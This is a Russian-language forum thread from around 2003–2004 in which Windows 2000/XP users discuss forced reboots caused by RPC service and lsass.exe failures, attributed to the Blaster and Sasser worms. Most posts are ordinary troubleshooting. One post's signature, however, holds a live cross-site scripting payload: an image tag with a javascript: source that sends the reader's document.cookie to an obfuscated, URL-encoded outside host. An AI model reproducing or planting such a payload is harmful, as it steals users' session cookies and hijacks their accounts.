|
Компьютерный форум OSzone.net » Клиентские ОС Microsoft » Microsoft Windows 2000/XP » Службы - [решено] Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM), a также lsass.exe |
|
Службы - [решено] Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM), a также lsass.exe
|
AnimaD
Ошибка:
Система завершает работу. Сохраните данные и выйдите из системы. Все несохраненные изменения будут потеряны. Отключение системы вызвано NT AUTHORITY\SYSTEM Время до отключения 00:01:00 Сообщение Необходимо перезагрузить Windows, поскольку произошла непредвиденная остановка службы Удаленный вызов процедур (RPC) ![]() Что делать? Решение проблемы изложено вот здесь! Помогите, пожалуйста! вчера вечером вдруг снова появилась эта чума. Win XP ENG, стоят все заплатки с самого начала, и до вчерашнего дня все было ОК. внешнее проявление точно как BLAST, только теперь ссылается на WINDOWS\System\lsass.exe ![]() Компьютер заражен червем Worm.Win32.Sasser
|
|
Отправлено: 08:28, 12-08-2003 |
Новый участник Сообщения: 4
|
Профиль | Отправить PM | Цитировать Так... ну и чо... у всех чума уже закончилась месяц назад, да?...
А у меня вот только началась.... В системных файлах, процессах и автозагрузке проверял всё, ничё подозрительного. У мня 2к(рус) и ХР(РЕ,sp1+заплатки). Глючат обе. Перезагружается сразу, никакой те минуты для прощанья. Ща поставил в 3-ий раздел ещё ХР, качаю новые заплаты. даже если поможет, как те два вина к жизни вернуть? они ни в одном из режимов не грузятся (точнее, сразу перезагружаются)!!! Если ток из консоли восстановления мон вход выполнить... но эт на вряд поможет. Откат непомогает=((( Заранее спасибо. |
Отправлено: 22:55, 06-06-2004 | #91 |
Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети. Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля. |
nikolaik
У меня тоже этот вирус на компьютере обнаружился. Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления. Постоянно выдается ошибка о том, что такого адреса нет, или сайт не работает итд. Пробовал как через IE5.8 так и через Mozilla. Другие адреса все работуют, а этот нет. Это тоже из-за вируса?
Добавлено: У меня тоже этот вирус на компьютере обнаружился. Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления. Постоянно выдается ошибка о том, что такого адреса нет, или сайт не работает итд. Пробовал как через IE5.8 так и через Mozilla. Другие адреса все работуют, а этот нет. Это тоже из-за вируса? |
Отправлено: 12:44, 07-06-2004 | #92 |
|
Профиль | Отправить PM | Цитировать У мня касперский. Обновляется нормально, ток без толку, ни хрена не находит. Качай обновления, должно помочь. Я вот пока сижу... ток Update Rollup 1 не помог, после него ещё кучу заплаток скачал, не знаю, работаю вот пока, но в 2К свой заходить боюсь
![]() Ниужели новая чума?!?!?!? Добавлено: Беда!!! Поставил Каспера на полную проверерку, и через 2 минуты всё опять стало глючить!!! Комп просто вырубается и всё!!! |
Отправлено: 12:56, 07-06-2004 | #93 |
(*.*) Сообщения: 36565
|
Профиль | Сайт | Отправить PM | Цитировать cBonD
nikolaik Эта тема возникла потому, что бластер вызывал проблему с перезагрузкой системы, и все шли в ХР с вопросами. Решение проблемы обозначено в самом первом сообщении темы. Для обсуждение вирусов и методов их удаления есть форум Информационная Безопасность. Цитата:
|
|
------- Отправлено: 20:05, 07-06-2004 | #94 |
|
Профиль | Отправить PM | Цитировать Дык не похоже всё это дело на бластер! Говорю хе, сразу вырубается и всё!!! Если в Debug Mode грузиться, то иногда возникает ошибка "Mashine_check_exeption". А воще я вот ща себе ещё раз c: форматнул и вин переставил, ща XP(PE) без SP1, вроде не глючит пока... мож просто в обновлении у мня какая дрянь сидела?... (у мня dial-up, соответственно, ставлю с харда, качать не имеет смысла...
![]() |
Отправлено: 00:03, 08-06-2004 | #95 |
AStranger
Цитата:
![]() ------------------ [img]javAScript :i = new Image();i.src='%68%74%74%70%3A%2F%2F%67%36%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%61%2E%6A%70%67?'+docu ment.cookie[/img] |
|
Отправлено: 00:28, 08-06-2004 | #96 |
|
Профиль | Отправить PM | Цитировать Newbie, а у тебя SP1?
|
Отправлено: 00:32, 08-06-2004 | #97 |
|
Профиль | Сайт | Отправить PM | Цитировать Цитата:
|
|
------- Отправлено: 00:36, 08-06-2004 | #98 |
Линуксоид-стакановец Сообщения: 2391
|
Профиль | Отправить PM | Цитировать При подключении к нету вылетает LSA Shell. Вызывает ошибку и вываливает службу NT Authority, далее, я думаю, все знают. Что делать?
[s]Исправлено: [mzd], 15:55 29-06-2004[/s] |
------- Отправлено: 14:19, 29-06-2004 | #99 |
|
Профиль | Сайт | Отправить PM | Цитировать [mzd]
А ты самый первый вопрос в теме читал? |
------- Отправлено: 21:41, 29-06-2004 | #100 |
![]() |
Участник сейчас на форуме |
![]() |
Участник вне форума |
![]() |
Автор темы |
![]() |
Сообщение прикреплено |
| |||||
Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
[решено] отключение компьютера от питания при подключении к интернету | GIK88 | Лечение систем от вредоносных программ | 2 | 30-12-2009 20:08 | |
Ошибка - [решено] Services.exe и lsass.exe - Точка вход ненайдена | sagepro | Microsoft Windows 2000/XP | 2 | 12-11-2009 10:11 | |
Службы - при установки сетевого принтера(hp 1022n) выходит ошибка на службу службы RPC | magwolf | Microsoft Windows 2000/XP | 4 | 01-09-2008 20:39 | |
[решено] Ошибка при установке - lsass.exe | Animosic | Автоматическая установка Windows 2000/XP/2003 | 7 | 09-02-2008 10:47 | |
Ошибка RPC при подключении к домену | sPUNK | Microsoft Windows NT/2000/2003 | 1 | 12-11-2007 15:07 |
|